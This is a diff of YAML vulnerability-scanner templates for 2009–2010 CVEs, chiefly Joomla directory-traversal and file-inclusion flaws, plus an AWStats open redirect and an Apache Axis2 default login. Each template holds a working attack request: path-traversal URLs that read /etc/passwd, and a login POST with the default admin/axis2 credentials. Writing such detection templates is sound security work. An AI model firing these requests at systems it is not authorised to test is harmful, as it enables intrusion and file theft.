--- /dev/null +++ b/cves/2009/CVE-2009-5020.yaml @@ -0,0 +1,31 @@ +id: CVE-2009-5020 + +info: + name: AWStats < 6.95 - Open Redirect + author: pdteam + severity: medium + description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2009-5020 + - http://awstats.sourceforge.net/docs/awstats_changelog.txt + remediation: Apply all relevant security patches and product upgrades. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2009-5020 + cwe-id: CWE-601 + tags: cve,cve2020,redirect,awstats + +requests: + - method: GET + path: + - '{{BaseURL}}/awstats/awredir.pl?url=example.com' + - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com' + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by mp on 2022/02/13 diff --git a/cves/2009/CVE-2009-5114.yaml b/cves/2009/CVE-2009-5114.yaml index b286f395e1..6f41634201 100644 --- a/cves/2009/CVE-2009-5114.yaml +++ b/cves/2009/CVE-2009-5114.yaml @@ -4,24 +4,27 @@ info: name: WebGlimpse 2.18.7 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. + description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. reference: - https://www.exploit-db.com/exploits/36994 - https://www.cvedetails.com/cve/CVE-2009-5114 + - http://websecurity.com.ua/2628/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/74321 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2009-5114 tags: cve,cve2009,lfi requests: - method: GET path: - "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0157.yaml b/cves/2010/CVE-2010-0157.yaml index 84ce7e02b3..4be62d0cfa 100644 --- a/cves/2010/CVE-2010-0157.yaml +++ b/cves/2010/CVE-2010-0157.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component com_biblestudy - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. + description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. reference: - https://www.exploit-db.com/exploits/10943 - https://www.cvedetails.com/cve/CVE-2010-0157 + - http://secunia.com/advisories/37896 + - http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-0157 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0219.yaml b/cves/2010/CVE-2010-0219.yaml new file mode 100644 index 0000000000..1599e7084c --- /dev/null +++ b/cves/2010/CVE-2010-0219.yaml @@ -0,0 +1,53 @@ +id: CVE-2010-0219 + +info: + name: Apache Axis2 Default Login + author: pikpikcu + severity: high + description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 + - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html + - http://www.rapid7.com/security-center/advisories/R7-0037.jsp + - http://www.vupen.com/english/advisories/2010/2673 + classification: + cve-id: CVE-2010-0219 + metadata: + shodan-query: http.html:"Apache Axis" + tags: cve,cve2010,axis,apache,default-login,axis2 + +requests: + - raw: + - | + POST /axis2-admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginUsername={{username}}&loginPassword={{password}} + + - | + POST /axis2/axis2-admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userName={{username}}&password={{password}}&submit=+Login+ + + payloads: + username: + - admin + password: + - axis2 + attack: pitchfork + + matchers-condition: and + matchers: + + - type: word + words: + - "

Welcome to Axis2 Web Admin Module !!

" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/02 diff --git a/cves/2010/CVE-2010-0467.yaml b/cves/2010/CVE-2010-0467.yaml index 6bb7060bae..1ce0e2d08e 100644 --- a/cves/2010/CVE-2010-0467.yaml +++ b/cves/2010/CVE-2010-0467.yaml @@ -4,29 +4,30 @@ info: name: Joomla! Component CCNewsLetter - Local File Inclusion author: daffainfo severity: medium - description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. - reference: | + description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. + reference: - https://www.exploit-db.com/exploits/11282 - https://www.cvedetails.com/cve/CVE-2010-0467 - tags: cve,cve2010,joomla,lfi + - http://www.securityfocus.com/bid/37987 + - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html + remediation: Apply all relevant security patches and upgrades. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.80 + cvss-score: 5.8 cve-id: CVE-2010-0467 cwe-id: CWE-22 + tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0696.yaml b/cves/2010/CVE-2010-0696.yaml index 66f1da7c88..b659158355 100644 --- a/cves/2010/CVE-2010-0696.yaml +++ b/cves/2010/CVE-2010-0696.yaml @@ -1,27 +1,31 @@ id: CVE-2010-0696 info: - name: Joomla! Component Jw_allVideos - Arbitrary File Download + name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval author: daffainfo severity: high - description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/11447 - https://www.cvedetails.com/cve/CVE-2010-0696 + - http://secunia.com/advisories/38587 + - http://www.joomlaworks.gr/content/view/77/34/ + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-0696 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0759.yaml b/cves/2010/CVE-2010-0759.yaml index 93c80ee785..3df6950eb6 100644 --- a/cves/2010/CVE-2010-0759.yaml +++ b/cves/2010/CVE-2010-0759.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. reference: - https://www.exploit-db.com/exploits/11498 - https://www.cvedetails.com/cve/CVE-2010-0759 - tags: cve,cve2010,joomla,lfi + - http://secunia.com/advisories/38637 + - http://www.securityfocus.com/bid/38296 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-0759 + tags: cve,cve2010,joomla,lfi,plugin requests: - method: GET path: - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0942.yaml b/cves/2010/CVE-2010-0942.yaml index f5d69afbca..cfbd90f032 100644 --- a/cves/2010/CVE-2010-0942.yaml +++ b/cves/2010/CVE-2010-0942.yaml @@ -8,20 +8,22 @@ info: reference: - https://www.exploit-db.com/exploits/11089 - https://www.cvedetails.com/cve/CVE-2010-0942 + - http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0942 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0943.yaml b/cves/2010/CVE-2010-0943.yaml index 14b6b3f668..8df6ca1a65 100644 --- a/cves/2010/CVE-2010-0943.yaml +++ b/cves/2010/CVE-2010-0943.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component com_jashowcase - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. + description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. reference: - https://www.exploit-db.com/exploits/11090 - https://www.cvedetails.com/cve/CVE-2010-0943 + - http://www.securityfocus.com/bid/37692 + - http://secunia.com/advisories/33486 + classification: + cve-id: CVE-2010-0943 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2010/CVE-2010-0944.yaml b/cves/2010/CVE-2010-0944.yaml index 075c61c086..e3e41de5b4 100644 --- a/cves/2010/CVE-2010-0944.yaml +++ b/cves/2010/CVE-2010-0944.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component com_jcollection - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11088 - https://www.cvedetails.com/cve/CVE-2010-0944 + - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt + - http://www.exploit-db.com/exploits/11088 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0944 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0972.yaml b/cves/2010/CVE-2010-0972.yaml index 10db45dc6c..37c142f65b 100644 --- a/cves/2010/CVE-2010-0972.yaml +++ b/cves/2010/CVE-2010-0972.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11738 - https://www.cvedetails.com/cve/CVE-2010-0972 + - http://secunia.com/advisories/38925 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0972 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0982.yaml b/cves/2010/CVE-2010-0982.yaml index 9fa799d4c8..a69166498d 100644 --- a/cves/2010/CVE-2010-0982.yaml +++ b/cves/2010/CVE-2010-0982.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component com_cartweberp - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/10942 - https://www.cvedetails.com/cve/CVE-2010-0982 + - http://www.securityfocus.com/bid/37581 + - http://secunia.com/advisories/37917 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0982 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-0985.yaml b/cves/2010/CVE-2010-0985.yaml index 8a68ba32ca..614705c1c5 100644 --- a/cves/2010/CVE-2010-0985.yaml +++ b/cves/2010/CVE-2010-0985.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component com_abbrev - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/10948 - https://www.cvedetails.com/cve/CVE-2010-0985 + - http://www.securityfocus.com/bid/37560 + - http://osvdb.org/61458 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0985 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-1056.yaml b/cves/2010/CVE-2010-1056.yaml index 2049880870..0d90b69924 100644 --- a/cves/2010/CVE-2010-1056.yaml +++ b/cves/2010/CVE-2010-1056.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component com_rokdownloads - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11760 - https://www.cvedetails.com/cve/CVE-2010-1056 + - http://www.securityfocus.com/bid/38741 + - http://secunia.com/advisories/38982 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-1056 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-1081.yaml b/cves/2010/CVE-2010-1081.yaml index 39650b4327..c6a152e813 100644 --- a/cves/2010/CVE-2010-1081.yaml +++ b/cves/2010/CVE-2010-1081.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11511 - https://www.cvedetails.com/cve/CVE-2010-1081 + - http://osvdb.org/62506 + - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-1081 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-1217.yaml b/cves/2010/CVE-2010-1217.yaml index 45872b620b..40edd4a34c 100644 --- a/cves/2010/CVE-2010-1217.yaml +++ b/cves/2010/CVE-2010-1217.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. reference: - https://www.exploit-db.com/exploits/11814 - https://www.cvedetails.com/cve/CVE-2010-1217 - tags: cve,cve2010,joomla,lfi + - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt + - http://www.securityfocus.com/bid/38866 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-1217 + tags: cve,cve2010,joomla,lfi,plugin requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/cves/2010/CVE-2010-1219.yaml b/cves/2010/CVE-2010-1219.yaml index 904655afb1..861e329273 100644 --- a/cves/2010/CVE-2010-1219.yaml +++ b/cves/2010/CVE-2010-1219.yaml @@ -1,26 +1,30 @@ id: CVE-2010-1219 + info: name: Joomla! Component com_janews - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11757 - https://www.cvedetails.com/cve/CVE-2010-1219 + - http://secunia.com/advisories/38952 + - http://www.securityfocus.com/bid/38746 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1219 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1302.yaml b/cves/2010/CVE-2010-1302.yaml index 8bf459dd68..2fd71f6329 100644 --- a/cves/2010/CVE-2010-1302.yaml +++ b/cves/2010/CVE-2010-1302.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component DW Graph - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11978 - https://www.cvedetails.com/cve/CVE-2010-1302 - tags: cve,cve2010,joomla,lfi + - http://www.securityfocus.com/bid/39108 + - http://secunia.com/advisories/39200 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1302 + tags: cve,cve2010,joomla,lfi,graph requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1304.yaml b/cves/2010/CVE-2010-1304.yaml index 96833ebf19..bc47af1a98 100644 --- a/cves/2010/CVE-2010-1304.yaml +++ b/cves/2010/CVE-2010-1304.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component User Status - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11998 - https://www.cvedetails.com/cve/CVE-2010-1304 - tags: cve,cve2010,joomla,lfi + - http://www.securityfocus.com/bid/39174 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1304 + tags: cve,cve2010,joomla,lfi,status requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1305.yaml b/cves/2010/CVE-2010-1305.yaml index ca2155a2d3..4649188fed 100644 --- a/cves/2010/CVE-2010-1305.yaml +++ b/cves/2010/CVE-2010-1305.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component JInventory 1.23.02 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12065 - https://www.cvedetails.com/cve/CVE-2010-1305 + - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951 + - http://secunia.com/advisories/39351 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1305 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1306.yaml b/cves/2010/CVE-2010-1306.yaml index 7a3b6a6390..5979a5b672 100644 --- a/cves/2010/CVE-2010-1306.yaml +++ b/cves/2010/CVE-2010-1306.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Picasa 2.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12058 - https://www.cvedetails.com/cve/CVE-2010-1306 + - http://secunia.com/advisories/39338 + - http://www.securityfocus.com/bid/39200 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1306 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1307.yaml b/cves/2010/CVE-2010-1307.yaml index 70c1ac485f..9b5bb7b612 100644 --- a/cves/2010/CVE-2010-1307.yaml +++ b/cves/2010/CVE-2010-1307.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Magic Updater - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12070 - https://www.cvedetails.com/cve/CVE-2010-1307 + - http://secunia.com/advisories/39348 + - http://www.vupen.com/english/advisories/2010/0806 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1307 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1308.yaml b/cves/2010/CVE-2010-1308.yaml index 991bc53f66..f9f2d84665 100644 --- a/cves/2010/CVE-2010-1308.yaml +++ b/cves/2010/CVE-2010-1308.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component SVMap 1.1.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12066 - https://www.cvedetails.com/cve/CVE-2010-1308 + - http://www.vupen.com/english/advisories/2010/0809 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1308 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1312.yaml b/cves/2010/CVE-2010-1312.yaml index 022a54afd8..cc121bbc5f 100644 --- a/cves/2010/CVE-2010-1312.yaml +++ b/cves/2010/CVE-2010-1312.yaml @@ -4,24 +4,27 